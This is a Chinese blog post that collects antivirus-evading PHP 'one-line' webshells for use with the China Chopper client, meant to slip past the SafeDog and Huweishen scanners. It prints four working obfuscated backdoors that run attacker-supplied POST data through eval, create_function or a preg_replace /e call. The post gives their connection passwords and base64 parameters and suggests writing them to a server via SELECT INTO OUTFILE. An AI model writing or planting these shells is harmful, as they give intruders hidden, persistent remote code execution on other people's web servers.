菜刀过狗一句话

参考:整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)

其中,第一个上面的一句话木马是:

if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content));
<O>com=settoken&content=ZXZhbCgkX1BPU1RbJ3BhZ2UnXSk7</O>
密码:page
其中,settoken的md5值是791dc312b38016ef998c1c146104cd5a,eval($_POST['page']);Base64编码为:“ZXZhbCgkX1BPU1RbJ3BhZ2UnXSk7”

第一个一句话是:

<?php  $mt="mFsKCleRfU"; $ojj="IEBleldle"; $hsa="E9TVFsnd2VuJ10p"; $fnx="Ow=="; $zk = str_replace("d","","sdtdrd_redpdldadcde"); $ef = $zk("z", "", "zbazsze64_zdzeczodze"); $dva = $zk("p","","pcprpepaptpe_fpupnpcptpipopn"); $zvm = $dva('', $ef($zk("le", "", $ojj.$mt.$hsa.$fnx))); $zvm(); ?> 
密码:wen
不知如何解释

第二个一句话是:

    <?php   
    @$a = $_POST['x'];   
    if(isset($a)){   
    @preg_replace("/(.∗)/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10='));   
    }   
    ?>  
其中,[@eval(base64_decode($_POST[z0]));]base64编码后是“W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10=”

但是第二句一句话我使用不成功,不知哪错了。

第三个一句话是:

<?php   
$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n985de9'];if(isset($s22)){eval($s21($s22));}?>
<O>n985de9=QGV2YWwoJF9QT1NUWzBdKTs=</O>
其中,@eval($_POST[0]);base64编码后是"QGV2YWwoJF9QT1NUWzBdKTs="

第四个一句话是:但不过狗,护卫神检测无木马

<?php $_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?>
其中$_uU=chr,$cC=eval($_POST[1]);,$_fF=create_function

经检测只有第二句不成功。

应该都可以select into outfile

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • (源自摘抄整理)https://www.91ri.org/11494.html Webshell实现与隐藏探究 一...
    JackyTsuuuy阅读 20,986评论 2 13
  • 在渗透测试的后期,为了维持权限。我们通常都会选择使用大小马或者通过添加账户等各种各样的方式给自己留个后门。但是事情...
    自我陶醉阅读 5,338评论 0 3
  • 一套实用的渗透测试岗位面试题,你会吗? 1.拿到一个待检测的站,你觉得应该先做什么? 收集信息 whois、网站源...
    g0阅读 4,930评论 0 9
  • 获取webshell总结 8月6号 1.CMS获取Webshell 方法:通过百度搜索引擎搜索cms网站程序名...
    小明都能被取名阅读 2,501评论 0 0
  • (1)runtime下temp生成临时文件 当控制器向html替换变量的时候,会在runtime下生成唯一编码的临...
    西兰花伟大炮阅读 737评论 0 0